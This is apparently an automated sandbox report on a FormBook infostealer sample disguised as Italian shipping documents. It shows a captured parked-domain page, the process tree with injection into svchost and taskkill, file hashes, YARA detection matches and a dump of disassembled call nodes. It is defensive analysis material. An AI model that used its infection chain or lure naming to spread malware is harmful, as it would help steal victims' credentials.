                      Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.albero-dveri.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                      Sep 22, 2024 18:04:32.644359112 CEST | 224 | IN
                      Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.albero-dveri.online</h
                      Sep 22, 2024 18:04:32.644376993 CEST | 1236 | IN
                      Data Ascii: 1><p class="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_s
                      Sep 22, 2024 18:04:32.645004988 CEST | 1236 | IN
                      Data Ascii: mage b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nb
                      Sep 22, 2024 18:04:32.645026922 CEST | 1236 | IN
                      Data Ascii: ing" href="https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amo
                      Sep 22, 2024 18:04:32.645962954 CEST1236INData Raw: 6d 70 61 63 74 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b
                      Data Ascii: mpact"> &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp; &nb
                      Sep 22, 2024 18:04:32.645987034 CEST1236INData Raw: 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63
                      Data Ascii: www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image
                      Sep 22, 2024 18:04:32.647017956 CEST1236INData Raw: bb d0 b5 d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 ba d0 bb d0 b8 d0 b5 d0 bd d1 82 d0 be d0 b2 20 d0 b8 26 6e 62 73 70 3b d1 83 d0 bb d1 83 d1 87 d1 88 d0 b8 d1 82 d0 b5 20 d0 b5 d0 b3 d0 be 20 53 45 4f 2d d0 bf d0 be d0 ba d0 b0 d0 b7 d0 b0 d1 82 d0
                      Data Ascii: &nbsp; &nbsp; SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="
                      Sep 22, 2024 18:04:32.647046089 CEST776INData Raw: 63 72 69 70 74 20 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 69 66 20 28 20 27 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 27 2e 6d 61 74 63 68 28 20 2f 78 6e 2d 2d 2f 20 29 20 26 26 20 64 6f 63 75 6d 65 6e
                      Data Ascii: cript );</script><script>if ( 'www.albero-dveri.online'.match( /xn--/ ) && document.querySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent'
                      Sep 22, 2024 18:04:32.647063971 CEST1145INData Raw: 20 3d 20 74 65 78 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 20 2f 5e 6e 6f 2d 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 20 20 20
                      Data Ascii: = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none'; } } }</script>... Global site tag (gtag.js) - Google Analytics --><script async src="http



                      Target ID:0
                      Start time:12:01:31
                      Start date:22/09/2024
                      Path:C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"
                      Imagebase:0x400000
                      File size:1'398'875 bytes
                      MD5 hash:15FCFDE4BCDE8E7DCE181856E02B1B24
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:1
                      Start time:12:01:31
                      Start date:22/09/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"
                      Imagebase:0xa00000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:true

                      Target ID:5
                      Start time:12:02:02
                      Start date:22/09/2024
                      Path:C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe"
                      Imagebase:0x280000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      Target ID:6
                      Start time:12:02:04
                      Start date:22/09/2024
                      Path:C:\Windows\SysWOW64\taskkill.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\taskkill.exe"
                      Imagebase:0x870000
                      File size:74'240 bytes
                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:false

                      Target ID:7
                      Start time:12:02:29
                      Start date:22/09/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff6bf500000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true


                        Execution Graph

                        Execution Coverage:3.5%
                        Dynamic/Decrypted Code Coverage:0.4%
                        Signature Coverage:8.8%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:36
40200c 85083->85087 85765 417f77 46 API calls __getptd_noexit 85083->85765 85086 4114c6 85766 417f25 10 API calls wcstoxl 85086->85766 85087->84862 85087->84863 85089->84891 85090->84894 85091->84898 85092->84898 85094 4026f0 52 API calls 85093->85094 85095 401c97 85094->85095 85095->85022 85096->85032 85097->85031 85158 40f6f0 85098->85158 85100 40f77b _strcat moneypunct 85166 40f850 85100->85166 85105 427c2a 85195 414d04 85105->85195 85107 40f7fc 85107->85105 85109 40f804 85107->85109 85182 414a46 85109->85182 85113 40f80e 85113->85036 85117 4528bd 85113->85117 85114 427c59 85201 414fe2 85114->85201 85116 427c79 85118 4150d1 _fseek 81 API calls 85117->85118 85119 452930 85118->85119 85698 452719 85119->85698 85122 452948 85122->85038 85123 414d04 __fread_nolock 61 API calls 85124 452966 85123->85124 85125 414d04 __fread_nolock 61 API calls 85124->85125 85126 452976 85125->85126 85127 414d04 __fread_nolock 61 API calls 85126->85127 85128 45298f 85127->85128 85129 414d04 __fread_nolock 61 API calls 85128->85129 85130 4529aa 85129->85130 85131 4150d1 _fseek 81 API calls 85130->85131 85132 4529c4 85131->85132 85133 4135bb _malloc 46 API calls 85132->85133 85134 4529cf 85133->85134 85135 4135bb _malloc 46 API calls 85134->85135 85136 4529db 85135->85136 85137 414d04 __fread_nolock 61 API calls 85136->85137 85138 4529ec 85137->85138 85139 44afef GetSystemTimeAsFileTime 85138->85139 85140 452a00 85139->85140 85141 452a36 85140->85141 85142 452a13 85140->85142 85143 452aa5 85141->85143 85144 452a3c 85141->85144 85145 413748 _free 46 API calls 85142->85145 85147 413748 _free 46 API calls 85143->85147 85704 44b1a9 85144->85704 85148 452a1c 85145->85148 85150 452aa3 85147->85150 85151 413748 _free 46 API calls 85148->85151 85149 452a9d 85153 413748 _free 46 API calls 85149->85153 85150->85038 85152 452a25 85151->85152 85152->85038 85153->85150 85155 431e64 85154->85155 85156 431e6a 85154->85156 85157 414a46 __fcloseall 82 API calls 85155->85157 85156->85039 85157->85156 
85159 425de2 85158->85159 85161 40f6fc _wcslen 85158->85161 85159->85100 85160 40f710 WideCharToMultiByte 85162 40f756 85160->85162 85163 40f728 85160->85163 85161->85160 85162->85100 85164 4115d7 52 API calls 85163->85164 85165 40f735 WideCharToMultiByte 85164->85165 85165->85100 85167 40f85d __crtGetStringTypeA_stat _strlen 85166->85167 85169 40f7ab 85167->85169 85214 414db8 85167->85214 85170 4149c2 85169->85170 85226 414904 85170->85226 85172 40f7e9 85172->85105 85173 40f5c0 85172->85173 85174 40f5cd _strcat __write_nolock _memmove 85173->85174 85175 414d04 __fread_nolock 61 API calls 85174->85175 85176 40f691 __tzset_nolock 85174->85176 85178 425d11 85174->85178 85314 4150d1 85174->85314 85175->85174 85176->85107 85179 4150d1 _fseek 81 API calls 85178->85179 85180 425d33 85179->85180 85181 414d04 __fread_nolock 61 API calls 85180->85181 85181->85176 85183 414a52 __wfsopen 85182->85183 85184 414a64 85183->85184 85185 414a79 85183->85185 85454 417f77 46 API calls __getptd_noexit 85184->85454 85187 415471 __lock_file 47 API calls 85185->85187 85191 414a74 __wfsopen 85185->85191 85189 414a92 85187->85189 85188 414a69 85455 417f25 10 API calls wcstoxl 85188->85455 85438 4149d9 85189->85438 85191->85113 85523 414c76 85195->85523 85197 414d1c 85198 44afef 85197->85198 85691 442c5a 85198->85691 85200 44b00d 85200->85114 85202 414fee __wfsopen 85201->85202 85203 414ffa 85202->85203 85204 41500f 85202->85204 85695 417f77 46 API calls __getptd_noexit 85203->85695 85206 415471 __lock_file 47 API calls 85204->85206 85208 415017 85206->85208 85207 414fff 85696 417f25 10 API calls wcstoxl 85207->85696 85210 414e4e __ftell_nolock 51 API calls 85208->85210 85211 415024 85210->85211 85697 41503d LeaveCriticalSection LeaveCriticalSection _fseek 85211->85697 85213 41500a __wfsopen 85213->85116 85215 414dd6 85214->85215 85216 414deb 85214->85216 85223 417f77 46 API calls __getptd_noexit 85215->85223 85216->85215 85221 414df2 85216->85221 85218 414ddb 85224 417f25 10 API calls 
wcstoxl 85218->85224 85220 414de6 85220->85167 85221->85220 85225 418f98 77 API calls 6 library calls 85221->85225 85223->85218 85224->85220 85225->85220 85227 414910 __wfsopen 85226->85227 85228 414923 85227->85228 85231 414951 85227->85231 85282 417f77 46 API calls __getptd_noexit 85228->85282 85230 414928 85283 417f25 10 API calls wcstoxl 85230->85283 85245 41d4d1 85231->85245 85234 414956 85235 41496a 85234->85235 85236 41495d 85234->85236 85238 414992 85235->85238 85239 414972 85235->85239 85284 417f77 46 API calls __getptd_noexit 85236->85284 85262 41d218 85238->85262 85285 417f77 46 API calls __getptd_noexit 85239->85285 85242 414933 __wfsopen @_EH4_CallFilterFunc@8 85242->85172 85246 41d4dd __wfsopen 85245->85246 85247 4182cb __lock 46 API calls 85246->85247 85260 41d4eb 85247->85260 85248 41d560 85287 41d5fb 85248->85287 85249 41d567 85251 416b04 __malloc_crt 46 API calls 85249->85251 85252 41d56e 85251->85252 85252->85248 85254 41d57c InitializeCriticalSectionAndSpinCount 85252->85254 85253 41d5f0 __wfsopen 85253->85234 85255 41d59c 85254->85255 85256 41d5af EnterCriticalSection 85254->85256 85259 413748 _free 46 API calls 85255->85259 85256->85248 85257 418209 __mtinitlocknum 46 API calls 85257->85260 85259->85248 85260->85248 85260->85249 85260->85257 85290 4154b2 47 API calls __lock 85260->85290 85291 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85260->85291 85263 41d23a 85262->85263 85264 41d255 85263->85264 85275 41d26c __wopenfile 85263->85275 85296 417f77 46 API calls __getptd_noexit 85264->85296 85266 41d25a 85297 417f25 10 API calls wcstoxl 85266->85297 85267 41d47a 85301 417f77 46 API calls __getptd_noexit 85267->85301 85268 41d48c 85293 422bf9 85268->85293 85272 41d47f 85302 417f25 10 API calls wcstoxl 85272->85302 85273 41499d 85286 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 85273->85286 85275->85267 85281 41d421 85275->85281 85298 41341f 58 API calls 2 library calls 85275->85298 85277 41d41a 85277->85281 85299 41341f 
58 API calls 2 library calls 85277->85299 85279 41d439 85279->85281 85300 41341f 58 API calls 2 library calls 85279->85300 85281->85267 85281->85268 85282->85230 85283->85242 85284->85242 85285->85242 85286->85242 85292 4181f2 LeaveCriticalSection 85287->85292 85289 41d602 85289->85253 85290->85260 85291->85260 85292->85289 85303 422b35 85293->85303 85295 422c14 85295->85273 85296->85266 85297->85273 85298->85277 85299->85279 85300->85281 85301->85272 85302->85273 85305 422b41 __wfsopen 85303->85305 85304 422b54 85306 417f77 wcstoxl 46 API calls 85304->85306 85305->85304 85307 422b8a 85305->85307 85308 422b59 85306->85308 85309 422400 __tsopen_nolock 109 API calls 85307->85309 85310 417f25 wcstoxl 10 API calls 85308->85310 85311 422ba4 85309->85311 85313 422b63 __wfsopen 85310->85313 85312 422bcb __wsopen_helper LeaveCriticalSection 85311->85312 85312->85313 85313->85295 85316 4150dd __wfsopen 85314->85316 85315 4150e9 85345 417f77 46 API calls __getptd_noexit 85315->85345 85316->85315 85317 41510f 85316->85317 85327 415471 85317->85327 85320 4150ee 85346 417f25 10 API calls wcstoxl 85320->85346 85326 4150f9 __wfsopen 85326->85174 85328 415483 85327->85328 85329 4154a5 EnterCriticalSection 85327->85329 85328->85329 85330 41548b 85328->85330 85331 415117 85329->85331 85332 4182cb __lock 46 API calls 85330->85332 85333 415047 85331->85333 85332->85331 85334 415067 85333->85334 85335 415057 85333->85335 85340 415079 85334->85340 85348 414e4e 85334->85348 85403 417f77 46 API calls __getptd_noexit 85335->85403 85339 41505c 85347 415143 LeaveCriticalSection LeaveCriticalSection _fseek 85339->85347 85365 41443c 85340->85365 85343 4150b9 85378 41e1f4 85343->85378 85345->85320 85346->85326 85347->85326 85349 414e61 85348->85349 85350 414e79 85348->85350 85404 417f77 46 API calls __getptd_noexit 85349->85404 85351 414139 __filbuf 46 API calls 85350->85351 85353 414e80 85351->85353 85356 41e1f4 __write 51 API calls 85353->85356 85354 414e66 85405 417f25 10 API calls wcstoxl 
85354->85405 85357 414e97 85356->85357 85358 414f09 85357->85358 85360 414ec9 85357->85360 85364 414e71 85357->85364 85406 417f77 46 API calls __getptd_noexit 85358->85406 85361 41e1f4 __write 51 API calls 85360->85361 85360->85364 85362 414f64 85361->85362 85363 41e1f4 __write 51 API calls 85362->85363 85362->85364 85363->85364 85364->85340 85366 414477 85365->85366 85367 414455 85365->85367 85371 414139 85366->85371 85367->85366 85368 414139 __filbuf 46 API calls 85367->85368 85369 414470 85368->85369 85407 41b7b2 77 API calls 6 library calls 85369->85407 85372 414145 85371->85372 85373 41415a 85371->85373 85408 417f77 46 API calls __getptd_noexit 85372->85408 85373->85343 85375 41414a 85409 417f25 10 API calls wcstoxl 85375->85409 85377 414155 85377->85343 85379 41e200 __wfsopen 85378->85379 85380 41e223 85379->85380 85381 41e208 85379->85381 85383 41e22f 85380->85383 85387 41e269 85380->85387 85430 417f8a 46 API calls __getptd_noexit 85381->85430 85432 417f8a 46 API calls __getptd_noexit 85383->85432 85384 41e20d 85431 417f77 46 API calls __getptd_noexit 85384->85431 85386 41e234 85433 417f77 46 API calls __getptd_noexit 85386->85433 85410 41ae56 85387->85410 85391 41e215 __wfsopen 85391->85339 85392 41e23c 85434 417f25 10 API calls wcstoxl 85392->85434 85393 41e26f 85395 41e291 85393->85395 85396 41e27d 85393->85396 85435 417f77 46 API calls __getptd_noexit 85395->85435 85420 41e17f 85396->85420 85399 41e289 85437 41e2c0 LeaveCriticalSection __unlock_fhandle 85399->85437 85400 41e296 85436 417f8a 46 API calls __getptd_noexit 85400->85436 85403->85339 85404->85354 85405->85364 85406->85364 85407->85366 85408->85375 85409->85377 85411 41ae62 __wfsopen 85410->85411 85412 41aebc 85411->85412 85413 4182cb __lock 46 API calls 85411->85413 85414 41aec1 EnterCriticalSection 85412->85414 85415 41aede __wfsopen 85412->85415 85416 41ae8e 85413->85416 85414->85415 85415->85393 85417 41aeaa 85416->85417 85418 41ae97 InitializeCriticalSectionAndSpinCount 85416->85418 85419 
41aeec ___lock_fhandle LeaveCriticalSection 85417->85419 85418->85417 85419->85412 85421 41aded __lseeki64_nolock 46 API calls 85420->85421 85422 41e18e 85421->85422 85423 41e1a4 SetFilePointer 85422->85423 85424 41e194 85422->85424 85426 41e1bb GetLastError 85423->85426 85427 41e1c3 85423->85427 85425 417f77 wcstoxl 46 API calls 85424->85425 85428 41e199 85425->85428 85426->85427 85427->85428 85429 417f9d __dosmaperr 46 API calls 85427->85429 85428->85399 85429->85428 85430->85384 85431->85391 85432->85386 85433->85392 85434->85391 85435->85400 85436->85399 85437->85391 85439 4149ea 85438->85439 85440 4149fe 85438->85440 85484 417f77 46 API calls __getptd_noexit 85439->85484 85443 41443c __flush 77 API calls 85440->85443 85446 4149fa 85440->85446 85442 4149ef 85485 417f25 10 API calls wcstoxl 85442->85485 85445 414a0a 85443->85445 85457 41d8c2 85445->85457 85456 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 85446->85456 85449 414139 __filbuf 46 API calls 85450 414a18 85449->85450 85461 41d7fe 85450->85461 85452 414a1e 85452->85446 85453 413748 _free 46 API calls 85452->85453 85453->85446 85454->85188 85455->85191 85456->85191 85458 414a12 85457->85458 85459 41d8d2 85457->85459 85458->85449 85459->85458 85460 413748 _free 46 API calls 85459->85460 85460->85458 85462 41d80a __wfsopen 85461->85462 85463 41d812 85462->85463 85464 41d82d 85462->85464 85501 417f8a 46 API calls __getptd_noexit 85463->85501 85465 41d839 85464->85465 85470 41d873 85464->85470 85503 417f8a 46 API calls __getptd_noexit 85465->85503 85468 41d817 85502 417f77 46 API calls __getptd_noexit 85468->85502 85469 41d83e 85504 417f77 46 API calls __getptd_noexit 85469->85504 85473 41ae56 ___lock_fhandle 48 API calls 85470->85473 85475 41d879 85473->85475 85474 41d846 85505 417f25 10 API calls wcstoxl 85474->85505 85477 41d893 85475->85477 85478 41d887 85475->85478 85506 417f77 46 API calls __getptd_noexit 85477->85506 85486 41d762 85478->85486 85480 41d81f __wfsopen 85480->85452 85482 41d88d 
85507 41d8ba LeaveCriticalSection __unlock_fhandle 85482->85507 85484->85442 85485->85446 85508 41aded 85486->85508 85488 41d7c8 85521 41ad67 47 API calls 2 library calls 85488->85521 85490 41d772 85490->85488 85491 41d7a6 85490->85491 85493 41aded __lseeki64_nolock 46 API calls 85490->85493 85491->85488 85494 41aded __lseeki64_nolock 46 API calls 85491->85494 85492 41d7d0 85495 41d7f2 85492->85495 85522 417f9d 46 API calls 3 library calls 85492->85522 85496 41d79d 85493->85496 85497 41d7b2 CloseHandle 85494->85497 85495->85482 85499 41aded __lseeki64_nolock 46 API calls 85496->85499 85497->85488 85500 41d7be GetLastError 85497->85500 85499->85491 85500->85488 85501->85468 85502->85480 85503->85469 85504->85474 85505->85480 85506->85482 85507->85480 85509 41adfa 85508->85509 85513 41ae12 85508->85513 85510 417f8a __read_nolock 46 API calls 85509->85510 85512 41adff 85510->85512 85511 417f8a __read_nolock 46 API calls 85514 41ae23 85511->85514 85516 417f77 wcstoxl 46 API calls 85512->85516 85513->85511 85515 41ae51 85513->85515 85517 417f77 wcstoxl 46 API calls 85514->85517 85515->85490 85518 41ae07 85516->85518 85519 41ae2b 85517->85519 85518->85490 85520 417f25 wcstoxl 10 API calls 85519->85520 85520->85518 85521->85492 85522->85495 85524 414c82 __wfsopen 85523->85524 85525 414cc3 85524->85525 85526 414c96 __crtGetStringTypeA_stat 85524->85526 85527 414cbb __wfsopen 85524->85527 85528 415471 __lock_file 47 API calls 85525->85528 85550 417f77 46 API calls __getptd_noexit 85526->85550 85527->85197 85530 414ccb 85528->85530 85536 414aba 85530->85536 85531 414cb0 85551 417f25 10 API calls wcstoxl 85531->85551 85537 414af2 85536->85537 85541 414ad8 __crtGetStringTypeA_stat 85536->85541 85552 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 85537->85552 85538 414ae2 85603 417f77 46 API calls __getptd_noexit 85538->85603 85540 414ae7 85604 417f25 10 API calls wcstoxl 85540->85604 85541->85537 85541->85538 85547 414b2d 85541->85547 85544 414c38 
__crtGetStringTypeA_stat 85606 417f77 46 API calls __getptd_noexit 85544->85606 85546 414139 __filbuf 46 API calls 85546->85547 85547->85537 85547->85544 85547->85546 85553 41dfcc 85547->85553 85583 41d8f3 85547->85583 85605 41e0c2 46 API calls 3 library calls 85547->85605 85550->85531 85551->85527 85552->85527 85554 41dfd8 __wfsopen 85553->85554 85555 41dfe0 85554->85555 85556 41dffb 85554->85556 85676 417f8a 46 API calls __getptd_noexit 85555->85676 85558 41e007 85556->85558 85562 41e041 85556->85562 85678 417f8a 46 API calls __getptd_noexit 85558->85678 85559 41dfe5 85677 417f77 46 API calls __getptd_noexit 85559->85677 85561 41e00c 85679 417f77 46 API calls __getptd_noexit 85561->85679 85565 41e063 85562->85565 85566 41e04e 85562->85566 85568 41ae56 ___lock_fhandle 48 API calls 85565->85568 85681 417f8a 46 API calls __getptd_noexit 85566->85681 85570 41e069 85568->85570 85569 41e053 85682 417f77 46 API calls __getptd_noexit 85569->85682 85571 41e077 85570->85571 85572 41e08b 85570->85572 85607 41da15 85571->85607 85683 417f77 46 API calls __getptd_noexit 85572->85683 85577 41e014 85680 417f25 10 API calls wcstoxl 85577->85680 85578 41e083 85685 41e0ba LeaveCriticalSection __unlock_fhandle 85578->85685 85579 41e090 85684 417f8a 46 API calls __getptd_noexit 85579->85684 85582 41dfed __wfsopen 85582->85547 85584 41d900 85583->85584 85587 41d915 85583->85587 85689 417f77 46 API calls __getptd_noexit 85584->85689 85586 41d905 85690 417f25 10 API calls wcstoxl 85586->85690 85589 41d94a 85587->85589 85594 41d910 85587->85594 85686 420603 85587->85686 85591 414139 __filbuf 46 API calls 85589->85591 85592 41d95e 85591->85592 85593 41dfcc __read 59 API calls 85592->85593 85595 41d965 85593->85595 85594->85547 85595->85594 85596 414139 __filbuf 46 API calls 85595->85596 85597 41d988 85596->85597 85597->85594 85598 414139 __filbuf 46 API calls 85597->85598 85599 41d994 85598->85599 85599->85594 85600 414139 __filbuf 46 API calls 85599->85600 85601 41d9a1 85600->85601 85602 
414139 __filbuf 46 API calls 85601->85602 85602->85594 85603->85540 85604->85537 85605->85547 85606->85540 85608 41da31 85607->85608 85609 41da4c 85607->85609 85610 417f8a __read_nolock 46 API calls 85608->85610 85611 41da5b 85609->85611 85613 41da7a 85609->85613 85612 41da36 85610->85612 85614 417f8a __read_nolock 46 API calls 85611->85614 85616 417f77 wcstoxl 46 API calls 85612->85616 85615 41da98 85613->85615 85630 41daac 85613->85630 85617 41da60 85614->85617 85619 417f8a __read_nolock 46 API calls 85615->85619 85627 41da3e 85616->85627 85618 417f77 wcstoxl 46 API calls 85617->85618 85621 41da67 85618->85621 85623 41da9d 85619->85623 85620 41db02 85622 417f8a __read_nolock 46 API calls 85620->85622 85624 417f25 wcstoxl 10 API calls 85621->85624 85625 41db07 85622->85625 85626 417f77 wcstoxl 46 API calls 85623->85626 85624->85627 85628 417f77 wcstoxl 46 API calls 85625->85628 85629 41daa4 85626->85629 85627->85578 85628->85629 85633 417f25 wcstoxl 10 API calls 85629->85633 85630->85620 85630->85627 85631 41dae1 85630->85631 85632 41db1b 85630->85632 85631->85620 85639 41daec ReadFile 85631->85639 85635 416b04 __malloc_crt 46 API calls 85632->85635 85633->85627 85636 41db31 85635->85636 85640 41db59 85636->85640 85641 41db3b 85636->85641 85637 41dc17 85638 41df8f GetLastError 85637->85638 85646 41dc2b 85637->85646 85642 41de16 85638->85642 85643 41df9c 85638->85643 85639->85637 85639->85638 85647 420494 __lseeki64_nolock 48 API calls 85640->85647 85645 417f77 wcstoxl 46 API calls 85641->85645 85650 417f9d __dosmaperr 46 API calls 85642->85650 85670 41dd9b 85642->85670 85644 417f77 wcstoxl 46 API calls 85643->85644 85648 41dfa1 85644->85648 85649 41db40 85645->85649 85655 41dc47 85646->85655 85663 41de5b 85646->85663 85646->85670 85651 41db67 85647->85651 85652 417f8a __read_nolock 46 API calls 85648->85652 85653 417f8a __read_nolock 46 API calls 85649->85653 85650->85670 85651->85639 85652->85670 85653->85627 85654 413748 _free 46 API calls 85654->85627 85656 
